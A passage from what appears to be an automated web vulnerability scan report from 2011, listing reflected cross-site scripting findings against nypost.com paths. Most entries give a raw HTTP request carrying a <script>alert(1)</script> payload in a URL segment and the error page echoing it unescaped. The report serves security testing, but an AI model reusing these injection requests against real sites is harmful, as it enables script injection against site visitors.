Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:32 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js67ba7<script>alert(1)</script>f79943d7d67</p>
...[SNIP]...

1.512. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_general.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/css/pkgs/_general.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a6aa9<script>alert(1)</script>077023dc889 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfiga6aa9<script>alert(1)</script>077023dc889/WebPortal/nypost/css/pkgs/_general.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 707
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:32:44 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfiga6aa9<script>alert(1)</script>077023dc889/WebPortal/nypost/css/pkgs/_general.css</p>
...[SNIP]...

1.513. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_general.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/css/pkgs/_general.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 84b9e<script>alert(1)</script>7574eff7a56 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal84b9e<script>alert(1)</script>7574eff7a56/nypost/css/pkgs/_general.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 707
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:32:49 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal84b9e<script>alert(1)</script>7574eff7a56/nypost/css/pkgs/_general.css</p>
...[SNIP]...

1.514. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_general.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/css/pkgs/_general.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 904d0<script>alert(1)</script>e4582393244 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost904d0<script>alert(1)</script>e4582393244/css/pkgs/_general.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 707
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:32:53 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost904d0<script>alert(1)</script>e4582393244/css/pkgs/_general.css</p>
...[SNIP]...

1.515. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_general.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/css/pkgs/_general.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8749c<script>alert(1)</script>a6dd37c3af was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/css8749c<script>alert(1)</script>a6dd37c3af/pkgs/_general.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:32:58 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/css8749c<script>alert(1)</script>a6dd37c3af/pkgs/_general.css</p>
...[SNIP]...

1.516. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_general.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/css/pkgs/_general.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e33ef<script>alert(1)</script>d49557b0939 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/css/pkgse33ef<script>alert(1)</script>d49557b0939/_general.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 707
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:01 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/css/pkgse33ef<script>alert(1)</script>d49557b0939/_general.css</p>
...[SNIP]...

1.517. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_general.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/css/pkgs/_general.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 18d57<script>alert(1)</script>6aa631dca77 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/css/pkgs/_general.css18d57<script>alert(1)</script>6aa631dca77 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 707
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:03 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/css/pkgs/_general.css18d57<script>alert(1)</script>6aa631dca77</p>
...[SNIP]...

1.518. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7f598<script>alert(1)</script>4ed4143b92a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig7f598<script>alert(1)</script>4ed4143b92a/WebPortal/nypost/css/pkgs/_homepage.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:32:47 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig7f598<script>alert(1)</script>4ed4143b92a/WebPortal/nypost/css/pkgs/_homepage.css</p>
...[SNIP]...

1.519. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 38ba5<script>alert(1)</script>7008224dc1b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal38ba5<script>alert(1)</script>7008224dc1b/nypost/css/pkgs/_homepage.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:32:53 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal38ba5<script>alert(1)</script>7008224dc1b/nypost/css/pkgs/_homepage.css</p>
...[SNIP]...

1.520. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cdad<script>alert(1)</script>92d48438688 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost6cdad<script>alert(1)</script>92d48438688/css/pkgs/_homepage.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:32:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost6cdad<script>alert(1)</script>92d48438688/css/pkgs/_homepage.css</p>
...[SNIP]...

1.521. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 73a2a<script>alert(1)</script>df3ef1f917c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/css73a2a<script>alert(1)</script>df3ef1f917c/pkgs/_homepage.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:01 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/css73a2a<script>alert(1)</script>df3ef1f917c/pkgs/_homepage.css</p>
...[SNIP]...

1.522. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cc5d2<script>alert(1)</script>449ea97bbc4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/css/pkgscc5d2<script>alert(1)</script>449ea97bbc4/_homepage.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:03 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/css/pkgscc5d2<script>alert(1)</script>449ea97bbc4/_homepage.css</p>
...[SNIP]...

1.523. http://www.nypost.com/r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload ee93b<script>alert(1)</script>56414281bab was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.cssee93b<script>alert(1)</script>56414281bab HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 708
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/css/pkgs/_homepage.cssee93b<script>alert(1)</script>56414281bab</p>
...[SNIP]...

1.524. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c3a1c<script>alert(1)</script>a1d53ebc51a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigc3a1c<script>alert(1)</script>a1d53ebc51a/WebPortal/nypost/images/favicon.ico HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 704
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigc3a1c<script>alert(1)</script>a1d53ebc51a/WebPortal/nypost/images/favicon.ico</p>
...[SNIP]...

1.525. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4ad7d<script>alert(1)</script>c57b650bad6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal4ad7d<script>alert(1)</script>c57b650bad6/nypost/images/favicon.ico HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 704
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal4ad7d<script>alert(1)</script>c57b650bad6/nypost/images/favicon.ico</p>
...[SNIP]...

1.526. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/images/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload afe55<script>alert(1)</script>5f67294b752 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostafe55<script>alert(1)</script>5f67294b752/images/favicon.ico HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 704
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:27 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostafe55<script>alert(1)</script>5f67294b752/images/favicon.ico</p>
...[SNIP]...

1.527. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/images/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 22ee2<script>alert(1)</script>a3b54475bce was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/images22ee2<script>alert(1)</script>a3b54475bce/favicon.ico HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 704
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:31 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/images22ee2<script>alert(1)</script>a3b54475bce/favicon.ico</p>
...[SNIP]...

1.528. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/images/favicon.ico

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a2141<script>alert(1)</script>7aebd84e00c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/images/favicon.icoa2141<script>alert(1)</script>7aebd84e00c HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 704
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:34 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/images/favicon.icoa2141<script>alert(1)</script>7aebd84e00c</p>
...[SNIP]...

1.529. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d6317<script>alert(1)</script>643940e8898 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

